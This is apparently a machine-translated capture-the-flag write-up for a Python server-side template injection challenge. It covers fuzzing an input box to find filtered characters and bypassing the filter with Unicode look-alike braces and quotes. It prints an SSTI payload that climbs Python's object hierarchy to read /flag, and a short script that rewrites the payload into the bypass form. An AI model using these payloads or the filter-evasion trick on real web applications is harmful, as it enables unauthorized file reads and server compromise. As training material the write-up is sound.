Catalog

  Add SSTI Used functions and payload

1. After getting the title , Do a directory scan , Unfortunately, nothing useful was found

2. There is an input box , Enter any parameter and pass bp Grab the bag and check

Two points of attention ： 1.Python/3.7.12 notice python Written , I think of it. SSTI Template Injection

Make sure that the server will treat the parameters we entered as html Language analysis . 

 2. Look at the returned fields , It should be filtered

Fuzzy test the input box

The test returns all single characters , namely ascii in 33-127 All characters of （ Special symbols , Letter case , Numbers ）

length by 198 What is filtered out

4. How to bypass filtering

According to the meaning , We can bypass by special characters

Websites with special characters ： A complete collection of symbols - Special symbols - A complete collection of special symbols (fhdq.net)

Direct input { Will be filtered out , So we can enter   ︷

Compared with , Both special symbols can be parsed into { 

  Make a brief summary of filtration

{ -> ︷/﹛
} -> ︸/﹜
' -> ＇

 5. Use the found filter conditions to solve problems

{
   {''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}}

 Turn into 

  Replacement successful

utilize python Replace characters

"""
{ -> ︷/﹛
} -> ︸/﹜
' -> ＇
, -> ,
"""
str='{
   {\'\'.__class__.__mro__[1].__subclasses__()[91].get_data(0,\'/flag\')}}' # Original string 


# If you need to replace replace( Replaced characters , The replaced character )
str=str.replace('{','︷')
str=str.replace('}','︸')
str=str.replace('\'','＇')

print(str)